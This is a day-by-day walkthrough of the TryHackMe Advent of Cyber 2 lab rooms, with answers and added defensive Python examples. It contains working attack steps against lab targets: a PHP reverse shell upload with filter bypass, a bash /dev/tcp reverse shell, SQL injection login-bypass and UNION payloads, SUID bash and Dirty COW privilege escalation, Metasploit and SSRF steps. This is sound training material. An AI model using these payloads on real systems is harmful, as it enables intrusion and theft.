TryHackMe-Advent Of Cyber 2
[Day 1] Web Exploitation A Christmas Crisis
Register with a username and password, then log in.
Next, open the browser developer tools (F12) and look under Storage for the cookies the site has set.
Tasks
- What is the name of the cookie used for authentication?
auth
- In what format is the value of this cookie encoded?
hexadecimal
- Having decoded the cookie, what format is the data stored in?
JSON
- What is the value of Santa's cookie?
Copy the cookie value and decode it from hex, edit the username field in the JSON to santa, then encode it back to hex and put it in place of the original cookie value in the browser.
Turn all the switches on and you'll get your flag for day 1.
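The hex-to-JSON-to-hex round trip described above, as an added Python example (this is not code from the room or from this writeup). forge_cookie does by hand what the walkthrough does in the browser; the signed variant below it is an assumption about how the app could be hardened, not what the room's app does. The sample cookie contents, the field names and the secret are constructed for the example.

```python
import binascii
import hashlib
import hmac
import json

# Constructed sample of what the "auth" cookie holds once hex-decoded:
# a JSON object with a username field (the other field is an assumption).
SAMPLE_COOKIE_HEX = binascii.hexlify(
    json.dumps({"company": "The Best Festival Company", "username": "elf"}).encode()
).decode()


def decode_cookie(cookie_hex: str) -> dict:
    """hex -> bytes -> JSON object, the way the app reads the auth cookie."""
    return json.loads(binascii.unhexlify(cookie_hex).decode())


def forge_cookie(cookie_hex: str, username: str) -> str:
    """Rewrite the username field and hex-encode the JSON again.
    This works because the cookie carries no integrity protection:
    the server trusts whatever username the client sends back."""
    data = decode_cookie(cookie_hex)
    data["username"] = username
    return binascii.hexlify(json.dumps(data).encode()).decode()


# Hardened variant (assumption, not the room's app): append an HMAC over the
# hex payload so that editing the JSON invalidates the cookie.
SECRET = b"server-side-secret-never-sent-to-the-client"  # constructed


def issue_signed_cookie(data: dict, key: bytes = SECRET) -> str:
    payload = binascii.hexlify(json.dumps(data, sort_keys=True).encode()).decode()
    tag = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}.{tag}"


def verify_signed_cookie(cookie: str, key: bytes = SECRET):
    """Return the decoded dict if the tag matches, otherwise None."""
    if "." not in cookie:
        return None
    payload, tag = cookie.rsplit(".", 1)
    expected = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):   # constant-time comparison
        return None
    return decode_cookie(payload)


if __name__ == "__main__":
    print("original :", decode_cookie(SAMPLE_COOKIE_HEX))
    print("forged   :", decode_cookie(forge_cookie(SAMPLE_COOKIE_HEX, "santa")))
```

Encoding is not authentication: hex and JSON are reversible by anyone, so the only things that stop this forgery are a MAC the client cannot compute (as above) or keeping the session state server side and handing the client only a random session identifier.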
[Day 2] Web Exploitation The Elf Strikes Back!
The page tells us to enter an ID using the id parameter.
The ID given to us is ODIzODI5MTNiYmYw
The upload page lets us upload a file, so we can try to upload a PHP reverse shell to get remote code execution:
https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
Then change the IP in the script to your attacking machine's IP; it's up to you to change the port or leave it as it is.
Tasks
- What string of text needs added to the URL to get access to the upload page?
?id=ODIzODI5MTNiYmYw
- What type of file is accepted by the site?
We can see from the source code of the page that three extensions are accepted: .jpeg, .jpg and .png, all image extensions.
image
- Bypass the filter and upload a reverse shell.
Change the extension of the reverse shell from .php to .jpeg.php: the check is satisfied by the .jpeg in the name, while the web server still runs the file as PHP because the name ends in .php.
- In which directory are the uploaded files stored?
We can guess the directory where files are uploaded; it is usually upload or uploads, and here uploads works.
OR
Use directory brute force. For some reason not all tools work: gobuster was finding redirects for everything, but dirsearch worked and found the uploads directory.
To get gobuster working with wildcard and redirect responses see
https://infinitelogins.com/2020/09/05/dealing-gobuster-wildcard-and-status-code-errors/
- Activate your reverse shell and catch it in a netcat listener!
Start the listener first, on the port you set in the shell:
nc -lvnp <port>
Then head over to the uploads directory and click your PHP reverse shell; the listener receives the shell.
- What is the flag in /var/www/flag.txt?
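The extension check that the .jpeg.php trick defeats, as an added Python example (not code from the room or this writeup). The naive filter accepts a name whenever an image extension appears anywhere in it; its exact logic is an assumption about the room's filter. The strict check beside it is the server-side fix: only the final extension counts, the name must be a plain basename, and the body must start with the right magic bytes. The allowed extensions are the three from the page; the upload bodies are constructed.

```python
import os

# The three extensions the page source says the site accepts.
ALLOWED_EXTENSIONS = {".jpeg", ".jpg", ".png"}

# Leading bytes of each accepted image type.
MAGIC = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
}

# Constructed stand-ins for upload bodies.
PNG_HEADER = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
PHP_SHELL = b"<?php system($_GET['cmd']); ?>"


def naive_filter_accepts(filename: str) -> bool:
    """A filter of the kind the bypass above defeats (its exact logic is an
    assumption): pass if any allowed extension appears anywhere in the name."""
    name = filename.lower()
    return any(ext in name for ext in ALLOWED_EXTENSIONS)


def strict_filter_accepts(filename: str, content: bytes) -> bool:
    """Hardened server-side check: only the final extension counts, it must
    be on the allow-list, the name must be a plain basename, and the body
    must start with that type's magic bytes."""
    base = os.path.basename(filename)
    if base != filename or "\x00" in base:
        return False                      # path components or NUL tricks
    ext = os.path.splitext(base)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        return False                      # "shell.jpeg.php" ends in .php
    return content.startswith(MAGIC[ext])


if __name__ == "__main__":
    for name in ("cat.png", "shell.jpeg.php", "shell.php\x00.png"):
        print(repr(name), naive_filter_accepts(name),
              strict_filter_accepts(name, PNG_HEADER))
```

Even the strict check can be fooled by a polyglot (a real PNG header with PHP appended), so the server must also store uploads where they are never executed (outside the web root, or with script execution disabled for that directory) and should rename them to a server-chosen name.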
[Day 3] Web Exploitation Christmas Chaos
For day 3 we have a web page which is a login page.
By looking at the source we can see the form field names: password for the password and username for the username.
We are also given the usernames and passwords to try:
Usernames
admin
root
user
Passwords
password
admin
12345
Let's fire up Burp Suite.
Capture the login request and send it to Intruder.
Set the attack type to Cluster Bomb, which tries every username against every password.
By default the username and password values have payload markers set.
Payload 1 is for usernames
Payload 2 is for passwords
In the results, a different response length for one request means the content of the page changed, so that pair is most likely the valid login.
Alternatively we can use hydra to brute force the login credentials.
Let's try logging in with those credentials.
[Day 4] Web Exploitation Santa's Watching
By looking at the source code we can't find anything, so let's brute force directories.
We find an /api directory, and in it a file.
- Given the URL "http://shibes.xyz/api.php", what would the entire wfuzz command look like to query the "breed" parameter using the wordlist "big.txt" (assume that "big.txt" is in your current directory)
wfuzz -c -z file,big.txt http://shibes.xyz/api.php?breed=FUZZ
- Use GoBuster to find the API directory. What file is there?
site-log.php
- Fuzz the date parameter on the file you found in the API directory. What is the flag displayed in the correct post?
Save the date wordlist from the room and fuzz the date parameter of that file with it, the same way as above but with date=FUZZ; hide the responses that all have the same size (wfuzz --hh or --hw) so the one different response stands out.
Open the PHP file with that date value and you'll get your flag.
[Day 5] Web Exploitation Someone stole Santa's gift list!
The hint in the room tells us the directory name.
To bypass the login we have to use SQL injection (SQLi).
Start Burp Suite, capture the login request on that page, save it to a file and pass it to sqlmap with -r to enumerate and dump the database.
- Without using directory brute forcing, what's Santa's secret login panel?
santapanel
- Visit Santa's secret login panel and bypass the login using SQLi
No answer needed
- How many entries are there in the gift database?
22
- What did Paul ask for?
github ownership
- What is the flag?
[redacted flag]
- What is admin's password?
EhCNSWzzFP6sc7gB
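The login bypass and the database dump that sqlmap automates, as an added Python example against a constructed in-memory SQLite database (this is not the room's application or its schema; the table and column names, and every row except the admin password and Paul's gift, are made up). The vulnerable functions build SQL by string formatting; the safe ones beside them bind parameters.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the gift database (schema is an assumption)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('admin', 'EhCNSWzzFP6sc7gB')")
    con.execute("CREATE TABLE gifts (title TEXT, kid TEXT)")
    con.executemany(
        "INSERT INTO gifts VALUES (?, ?)",
        [("github ownership", "Paul"), ("rubber duck", "Pam")],
    )
    return con


def login_vuln(con, username: str, password: str) -> bool:
    """String-built query: quotes in the input become part of the SQL."""
    sql = (f"SELECT 1 FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return con.execute(sql).fetchone() is not None


def login_safe(con, username: str, password: str) -> bool:
    """Parameterised query: the driver binds the values as data only."""
    sql = "SELECT 1 FROM users WHERE username = ? AND password = ?"
    return con.execute(sql, (username, password)).fetchone() is not None


def search_vuln(con, q: str) -> list:
    """The gift search built the same unsafe way; a UNION reads other tables."""
    sql = f"SELECT title, kid FROM gifts WHERE title LIKE '%{q}%'"
    return con.execute(sql).fetchall()


def search_safe(con, q: str) -> list:
    sql = "SELECT title, kid FROM gifts WHERE title LIKE ?"
    return con.execute(sql, (f"%{q}%",)).fetchall()


# Payloads of the kind sqlmap tries; "--" comments out the rest of the query.
BYPASS = "' OR 1=1 --"
DUMP_USERS = "' UNION SELECT username, password FROM users --"


if __name__ == "__main__":
    db = make_db()
    print("bypass (vuln):", login_vuln(db, BYPASS, "anything"))
    print("bypass (safe):", login_safe(db, BYPASS, "anything"))
    print("dump   (vuln):", search_vuln(db, DUMP_USERS))
```

The UNION payload needs the same number of columns as the original SELECT, which is why sqlmap first probes the column count; with parameter binding the whole payload is matched as a literal pattern and returns nothing.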
[Day 6] Be careful with what you wish on Christmas night
The dossier the room gives us explains what XSS is, its types and how to mitigate it, and tells the story of how the attacker exploited the web app; reading all of that lets us answer the questions.
- What vulnerability type was used to exploit the application?
Stored Cross-site scripting
- What query string can be abused to craft a reflected XSS?
We can see that the search query parameter is q, so the answer is q
- Launch the OWASP ZAP Application
No answer needed
- Run a ZAP (zaproxy) automated scan on the target. How many XSS alerts are in the scan?
2
- Explore the XSS alerts that ZAP has identified, are you able to make an alert appear on the "Make a wish" website?
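The reflected XSS through the q parameter, as an added Python example (not code from the room's site or this writeup): a page that reflects the search term straight into its HTML beside one that output-encodes it. The template and the payload are constructed; the same output-encoding rule is what fixes the stored variant, since it does not matter whether the string arrived from the URL or from the database.

```python
import html
from urllib.parse import parse_qs, urlencode, urlsplit

# Constructed template: q lands both inside an attribute and in text content.
TEMPLATE = '<input name="q" value="{q}"><h1>Results for: {q}</h1>'


def search_url(q: str) -> str:
    """Build /search?q=... the way a browser would (percent-encoded)."""
    return "/search?" + urlencode({"q": q})


def _query_param(url: str) -> str:
    return parse_qs(urlsplit(url).query).get("q", [""])[0]


def render_vuln(url: str) -> str:
    """Reflects q straight into the HTML: reflected XSS."""
    return TEMPLATE.format(q=_query_param(url))


def render_safe(url: str) -> str:
    """Output-encodes q for the HTML context; quote=True also escapes the
    quote characters, which matters inside the attribute value."""
    return TEMPLATE.format(q=html.escape(_query_param(url), quote=True))


# Breaks out of the value="..." attribute and then injects a script tag.
PAYLOAD = '"><script>alert(1)</script>'


if __name__ == "__main__":
    print(render_vuln(search_url(PAYLOAD)))
    print(render_safe(search_url(PAYLOAD)))
```

Escaping for HTML is the right encoding only for HTML text and attribute contexts; a value reflected into a script block, a URL, or a CSS property needs that context's own encoding.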
[Day 7] Networking The Grinch Really Did Steal Christmas
- Open "pcap1.pcap" in Wireshark. What is the IP address that initiates an ICMP/ping?
Apply the display filter icmp; the source address of the first Echo (ping) request packet is the answer.
- If we only wanted to see HTTP GET requests in our "pcap1.pcap" file, what filter would we use?
http.request.method == GET
- Now apply this filter to "pcap1.pcap" in Wireshark, what is the name of the article that the IP address "10.10.67.119" visited?
/reindeer-of-the-week/
- Let's begin analysing "pcap2.pcap". Look at the captured FTP traffic; what password was leaked during the login process?
Follow the TCP stream of the FTP control connection (packet 14 here) and look for the PASS command.
plaintext_password_fiasco
- Continuing with our analysis of "pcap2.pcap", what is the name of the protocol that is encrypted?
ssh
- Analyse "pcap3.pcap" and recover Christmas! What is on Elf McSkidy's wishlist that will be used to replace Elf McEager?
Go to File -> Export Objects -> HTTP, save elf_mcskidy_wishlist.txt and read its contents.
rubber ducky
[Day 8] What's Under the Christmas Tree
- When was Snort created?
A quick web search for Snort's history gives the answer.
1998
- Using Nmap on 10.10.43.247, what are the port numbers of the three services running? (Please provide your answer in ascending order/lowest -> highest, separated by a comma)
80,2222,3389
- Use Nmap to determine the name of the Linux distribution that is running, what is reported as the most likely distribution to be running?
Ubuntu
- Use Nmap's Network Scripting Engine (NSE) to retrieve the "HTTP-TITLE" of the webserver. Based on the value returned, what do we think this website might be used for?
blog
[Day 9] Networking Anyone can be Santa!
From the nmap scan we can see that anonymous FTP login is enabled.
Here you can either download the important files individually or grab everything by downloading recursively.
- Name the directory on the FTP server that has data accessible by the "anonymous" user
public
- What script gets executed within this directory?
backup.sh
- What movie did Santa have on his Christmas shopping list?
The Polar Express
- Re-upload this script to contain malicious data (just like we did in section 9.6). Output the contents of /root/flag.txt!
Now we know that backup.sh gets executed from this directory, so we create our own backup.sh containing a bash reverse shell and upload it over the anonymous FTP session:
bash -i >& /dev/tcp/Your_TryHackMe_IP/4444 0>&1
Set up a netcat listener on port 4444 first; when the script runs you get a shell and can read /root/flag.txt.
[Day 10] Networking Don't be selfish
- Using enum4linux, how many users are there on the Samba server (10.10.215.162)?
3
- Now how many "shares" are there on the Samba server?
4
- Use smbclient to try to login to the shares on the Samba server (10.10.215.162). What share doesn't require a password?
tbfc-santa
- Log in to this share, what directory did ElfMcSkidy leave for Santa?
jingle-tunes
[Day 11] Networking The Rogue Gnome
We log in through SSH with the credentials cmnatic:aoc2020 which are provided in the room.
Run a find command over the filesystem for files with the SUID bit set (permission 4000).
Here we find /bin/bash with SUID set, so running it as bash -p gives us a root shell without sudo (without -p, bash drops the elevated effective UID on start).
- What type of privilege escalation involves using a user account to execute commands as an administrator?
vertical
- What is the name of the file that contains a list of users who are part of the sudo group?
sudoers
- What are the contents of the file located at /root/flag.txt?
[redacted flag]
[Day 12] Networking Ready, set, elf
Since this is a Windows box it won't answer ping (ICMP echo is blocked by the host firewall), so skip host discovery with -Pn:
nmap -Pn -sC -sV <machine_ip>
Nmap scan report for 10.10.99.103
Host is up (0.45s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: TBFC-WEB-01
| NetBIOS_Domain_Name: TBFC-WEB-01
| NetBIOS_Computer_Name: TBFC-WEB-01
| DNS_Domain_Name: tbfc-web-01
| DNS_Computer_Name: tbfc-web-01
| Product_Version: 10.0.17763
|_ System_Time: 2020-12-12T17:42:01+00:00
| ssl-cert: Subject: commonName=tbfc-web-01
| Not valid before: 2020-11-27T01:29:04
|_Not valid after: 2021-05-29T01:29:04
|_ssl-date: 2020-12-12T17:42:07+00:00; 0s from scanner time.
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| ajp-methods:
|_ Supported methods: GET HEAD POST OPTIONS
8080/tcp open http Apache Tomcat 9.0.17
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.17
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
- What is the version number of the web server?
From the nmap result the web server is Apache Tomcat and its version is
9.0.17
- What CVE can be used to create a Meterpreter entry onto the machine? (Format: CVE-XXXX-XXXX)
Searching online for an exploit against Apache Tomcat 9.0.17 on Windows gives the CVE.
- Set your Metasploit settings appropriately and gain a foothold onto the deployed machine.
The room gives us the name of a script that exists in the /cgi-bin/ directory; set it as the target script in the module options.
- What are the contents of flag1.txt
[redacted flag]
- Looking for a challenge? Try to find out some of the vulnerabilities present to escalate your privileges!
You can run the Metasploit local exploit suggester (post/multi/recon/local_exploit_suggester) against your session.
Bonus
You can log into the system via RDP by adding a user with a password and putting it into the local Administrators group; from the Meterpreter session run
run getgui -u [USER_NAME] -p [PASS]
[Day 13] Special by John Hammond Coal for Christmas
Run an nmap scan on the machine:
Nmap scan report for 10.10.124.226
Host is up (0.41s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 68:60:de:c2:2b:c6:16:d8:5b:88:be:e3:cc:a1:25:75 (DSA)
| 2048 50:db:75:ba:11:2f:43:c9:ab:14:40:6d:7f:a1:ee:e3 (RSA)
|_ 256 11:5d:55:29:8a:77:d8:08:b4:00:9b:a3:61:93:fe:e5 (ECDSA)
23/tcp open telnet Linux telnetd
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 39894/udp status
| 100024 1 53070/tcp6 status
| 100024 1 53853/tcp status
|_ 100024 1 54547/udp6 status
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.65 seconds
- What old, deprecated protocol and service is running?
telnet
- What credential was left for you?
Connect to telnet
clauschristmas
- What distribution of Linux and version number is this server running?
Ubuntu 12.04
- Who got here first?
Grinch
- What is the verbatim syntax you can use to compile, taken from the real C source code comments?
Visit https://dirtycow.ninja/ to grab the Dirty COW exploit (dirty.c); the compile line is in the comments at the top of the source:
gcc -pthread dirty.c -o dirty -lcrypt
- Privilege Escalation: run the commands to compile the exploit, and run it.
Transfer the Dirty COW exploit you grabbed from the internet to the target, for example by serving it with a Python HTTP server on your machine.
Compile the dirty.c file, then run the compiled dirty binary.
Now read message_from_the_grinch.txt in the root directory.
It says to create a coal file, then use the tree command to list the files as a tree and pipe that into md5sum to get a hash.
The generated MD5 hash is our flag: 8b16f00dd3b51efadb02c1df7f8427cc
[Day 14] Special by TheCyberMentor
Where's Rudolph ?
- What URL will take me directly to Rudolph's Reddit comment history?
Doing a simple Google search with the username given to us:
https://www.reddit.com/user/IGuidetheClaus2020/comments/
- According to Rudolph, where was he born?
Reading his comments we can then answer these questions
Chicago
- Rudolph mentions Robert. Can you use Google to tell me Robert's last name?
May
- On what other social media platform might Rudolph have an account?
Rudolph mentions Twitter, so we google his Reddit username together with twitter.
Twitter
- What is Rudolph's username on that platform?
Opening the link from the previous search, we can see his Twitter handle.
IGuideClaus2020
- What appears to be Rudolph's favorite TV show right now?
Going through his tweets
Bachelorette
- Based on Rudolph's post history, he took part in a parade. Where did the parade take place?
Reverse image searching the parade photo through Google
Chicago
- Okay, you found the city, but where specifically was one of the photos taken?
Go through his tweets and find a higher resolution image, then upload it to an online EXIF tool to read the GPS coordinates.
41.891815, -87.624277
- Did you find a flag too?
{FLAG}ALWAYSCHECKTHEEXIFD4T4
- Has Rudolph been pwned? What password of his appeared in a breach?
We can find his email in his Twitter bio and check it against a breach database.
spygame
- Based on all the information gathered. It's likely that Rudolph is in the Windy City and is staying in a hotel on Magnificent Mile. What are the street numbers of the hotel address?
Search the coordinates from the image's EXIF data on Google Maps and look for nearby hotels.
540
[Day 15] Scripting There's a Python in my stocking !
- What's the output of True + True?
In Python True is 1 and False is 0 in arithmetic, so this is 1 + 1:
2
- What's the database for installing other peoples libraries called?
PyPI
- What is the output of bool("False")?
It gives the output True because bool() of a string is True for any non-empty string and False only for the empty string; the text "False" inside the string does not matter.
True
- What library lets us download the HTML of a webpage?
You could just google the two libraries used in the example.
Requests
- What is the output of the program provided in "Code to analyse for Question 5" in the task's material (above the Christmas banner and below the links in the main body of this task?)
[1, 2, 3, 6]
- What causes the previous task to output that?
The result shows the change made through y because in Python assigning a list to a new name does not copy it: x and y are two names for the same list object in memory, so whatever change is made through y is visible through x. The room calls this
Pass By Reference
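The aliasing behind the room's snippet, as an added Python example (not the room's code): the shared-object case next to the three cases it is usually confused with, a shallow copy, a shallow copy of nested lists, and an immutable value.

```python
import copy


def alias_demo():
    """What the room's snippet does: y = x makes a second name for one list."""
    x = [1, 2, 3]
    y = x
    y.append(6)
    return x, y is x        # x sees the append; both names share one object


def shallow_copy_demo():
    """y = x[:] (or list(x)) builds a new list, so x is untouched."""
    x = [1, 2, 3]
    y = x[:]
    y.append(6)
    return x, y


def nested_copy_demo():
    """A shallow copy still shares the inner lists; deepcopy does not."""
    x = [[1], [2]]
    shallow = x[:]
    deep = copy.deepcopy(x)
    shallow[0].append(9)    # reaches x[0] through the shared inner list
    return x, deep


def immutable_demo():
    """With an int, y += 1 rebinds y to a new object; x keeps its value."""
    x = 5
    y = x
    y += 1
    return x, y


if __name__ == "__main__":
    print(alias_demo(), shallow_copy_demo(), nested_copy_demo(), immutable_demo())
```

The same sharing applies to function arguments: a function that appends to a list it was passed changes the caller's list, which is why input validation code should copy (or never mutate) what it receives.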
[Day 16] Scripting Help! Where is Santa?
NMAP
nmap -Pn 10.10.9.148
Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-16 22:40 PKT
Nmap scan report for 10.10.9.148
Host is up (0.42s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
8000/tcp open http-alt
- What is the port number for the web server?
8000
- Without using enumeration tools such as Dirbuster, what is the directory for the API? (without the API key)
Running the scraping script we wrote with the BeautifulSoup library, we find the link <a href="http://machine_ip/api/api_key">Modular modern free</a>
So the API directory is
/api/
- Where is Santa right now?
Winter Wonderland, Hyde Park, London
- Find out the correct API key. Remember, this is an odd number between 0-100. After too many attempts, Santa's Sled will block you. To unblock yourself, simply terminate and re-deploy the target instance (MACHINE_IP)
57
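The two pieces of this day's script, plus the Cluster Bomb logic from day 3, as one added Python example (not the room's script or this writeup's code): a standard-library link scraper standing in for the BeautifulSoup scrape, a candidate generator for each attack (every username against every password; odd numbers between 0 and 100), and a brute-force loop that stops before the lockout the room warns about. The HTML snippet is constructed around the link quoted above; the probe that treats 57 as the valid key simulates the target and is an assumption for the demo, since the real script would send HTTP requests.

```python
import itertools
from html.parser import HTMLParser

# Constructed snippet standing in for the target's front page (the link text
# and href are the ones quoted in the walkthrough).
SAMPLE_HTML = """
<html><body>
<a href="/about">About</a>
<a href="http://machine_ip/api/api_key">Modular modern free</a>
</body></html>
"""


class LinkCollector(HTMLParser):
    """Stdlib stand-in for the BeautifulSoup scrape: gather every href."""

    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.links.append(value)


def find_api_links(page_html: str) -> list:
    """Return the hrefs that point under /api/."""
    parser = LinkCollector()
    parser.feed(page_html)
    return [h for h in parser.links if "/api/" in h]


def cluster_bomb(usernames, passwords):
    """Every username paired with every password: Burp Intruder's Cluster Bomb."""
    return itertools.product(usernames, passwords)


def odd_keys():
    """Day 16 constraint: the key is an odd number between 0 and 100."""
    return range(1, 100, 2)


class Blocked(Exception):
    """Raised when we would exceed the target's attempt limit."""


def brute_force(candidates, probe, max_attempts):
    """Send candidates to probe() until one is accepted (probe returns True).
    Stops before the lockout so a blocked instance need not be redeployed."""
    for attempts, candidate in enumerate(candidates, start=1):
        if attempts > max_attempts:
            raise Blocked(f"giving up after {max_attempts} attempts")
        if probe(candidate):
            return candidate
    return None


if __name__ == "__main__":
    # Simulated endpoint: treats 57 as the valid key (assumption for the demo).
    print(find_api_links(SAMPLE_HTML))
    print(brute_force(odd_keys(), lambda key: key == 57, max_attempts=50))
```

Narrowing the candidate space first (only odd values, only the users the page lists) matters more than speed: the room blocks after too many attempts, and a real target's lockout both stops the attack and leaves an obvious trail in its logs.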
[Day 17] Reverse Engineering ReverseELFneering
SSH into the machine with the credentials provided.
Run radare2 on the binary, analyse it with aa, then run pdf @main, which prints the disassembly of the function named after the @.
- What is the value of local_ch when its corresponding movl instruction is called (first if multiple)?
We can see the value right next to the movl instruction
1
- What is the value of eax when the imull instruction is called?
So it's multiplying the two values we have: mov eax, dword [local_ch] -> 6 * 1
6
- What is the value of local_4h before eax is set to 0?
Following the above instructions eax holds the value 6 and the instruction is
mov dword [local_4h], eax
So it transfers the value of eax to local_4h
6
[Day 18] Reverse Engineering The Bits of Christmas
NMAP
nmap -Pn -sC -sV 10.10.63.64
Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-18 23:23 PKT
Nmap scan report for 10.10.63.64
Host is up (0.43s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: TBFC-CMN-RE2
| NetBIOS_Domain_Name: TBFC-CMN-RE2
| NetBIOS_Computer_Name: TBFC-CMN-RE2
| DNS_Domain_Name: tbfc-cmn-re2
| DNS_Computer_Name: tbfc-cmn-re2
| Product_Version: 10.0.17763
|_ System_Time: 2020-12-18T18:24:30+00:00
| ssl-cert: Subject: commonName=tbfc-cmn-re2
| Not valid before: 2020-12-16T17:42:47
|_Not valid after: 2021-06-17T17:42:47
|_ssl-date: 2020-12-18T18:24:31+00:00; 0s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.53 seconds
Log in over RDP with the credentials, then launch dotPeek and open TBFC_APP.
You'll see CrackMe in the Assembly Explorer; expand it and analyse Dispose(boolA_):void, where the password is compared.
- What is Santa's password?
santapassword321
- Now that you've retrieved this password, try to login...What is the flag?
[Day 19] Special by Tib3rius The Naughty or Nice List
A second web server is running locally on the box; we reach it through the proxy parameter, which fetches whatever URL we give it:
http://10.10.206.196/?proxy=http://list.hohoho.localtest.me
That page gives us the password Be good for goodness sake!
Log in with the username Santa and the password we found.
Then just click the button and it will give you the flag.
[Day 20] Blue Teaming PowershELlF to the rescue
Host is up (0.44s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE VERSION
3389/tcp open ssl/ms-wbt-server?
| rdp-ntlm-info:
| Target_Name: ELFSTATION1
| NetBIOS_Domain_Name: ELFSTATION1
| NetBIOS_Computer_Name: ELFSTATION1
| DNS_Domain_Name: elfstation1
| DNS_Computer_Name: elfstation1
| Product_Version: 10.0.17763
|_ System_Time: 2020-12-21T13:57:11+00:00
| ssl-cert: Subject: commonName=elfstation1
| Not valid before: 2020-11-25T19:32:43
|_Not valid after: 2021-05-27T19:32:43
|_ssl-date: 2020-12-21T13:57:13+00:00; 0s from scanner time.
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 771.79 seconds
Log in to the Windows box through SSH with the provided credentials.
Then enter the command powershell to launch PowerShell within the terminal.
- Search for the first hidden elf file within the Documents folder. Read the contents of this file. What does Elf 1 want?
- Search on the desktop for a hidden folder that contains the file for Elf 2. Read the contents of this file. What is the name of that movie that Elf 2 wants?
- Search the Windows directory for a hidden folder that contains files for Elf 3. What is the name of the hidden folder? (This command will take a while)
- How many words does the first file contain?
- What 2 words are at index 551 and 6991 in the first file?
- This is only half the answer. Search in the 2nd file for the phrase from the previous question to get the full answer. What does Elf 3 want? (use spaces when submitting the answer)
[Day 21] Blue Teaming Time for some ELForensics
Log in to the machine through RDP with the given credentials.
- Read the contents of the text file within the Documents folder. What is the file hash for db.exe?
- What is the file hash of the mysterious executable within the Documents folder?
- Using Strings find the hidden flag within the executable?
- What is the flag that is displayed when you run the database connector file?
Running deebee.exe, the database connector executable.
Run the command given in the room to list the alternate data streams of the executable.
Now that we know the name of the hidden stream, we use wmic to execute the executable with that stream.
[Day 22] Blue Teaming Elf McEager becomes CyberElf
Host is up (0.46s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: ELFSTATION3
| NetBIOS_Domain_Name: ELFSTATION3
| NetBIOS_Computer_Name: ELFSTATION3
| DNS_Domain_Name: elfstation3
| DNS_Computer_Name: elfstation3
| Product_Version: 10.0.17763
|_ System_Time: 2020-12-22T16:04:40+00:00
| ssl-cert: Subject: commonName=elfstation3
| Not valid before: 2020-11-28T23:32:54
|_Not valid after: 2021-05-30T23:32:54
|_ssl-date: 2020-12-22T16:04:41+00:00; -1s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.23 seconds
Log in to the box through RDP with the credentials.
- What is the password to the KeePass database?
One folder's name is a base64-encoded string; decoding it gives the message, which is the master key for the KeePass database.
- What is the encoding method listed as the 'Matching ops'?
base64
- What is the decoded password value of the Elf Server?
- What is the decoded password value for ElfMail?
- Decode the last encoded value. What is the flag?
[Day 23] Blue Teaming The Grinch strikes again!
Use RDP to login to the windows machine with the given creds.
- Decrypt the fake 'bitcoin address' within the ransom note. What is the plain text value?
- At times ransomware changes the file extensions of the encrypted files. What is the file extension for each of the encrypted files?
- What is the name of the suspicious scheduled task?
- Inspect the properties of the scheduled task. What is the location of the executable that is run at login?
- There is another scheduled task that is related to VSS. What is the ShadowCopyVolume ID?
- Assign the hidden partition a letter. What is the name of the hidden folder?
Assign a drive letter to the hidden partition (Disk Management or diskpart).
- Right-click and inspect the properties for the hidden folder. Use the 'Previous Versions' tab to restore the encrypted file that is within this hidden folder to the previous version. What is the password within the file?
[Day 24] Special by DarkStar The Trial Before Christmas
Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-25 00:24 PKT
Nmap scan report for 10.10.6.114
Host is up (0.41s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
65000/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Light Cycle
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
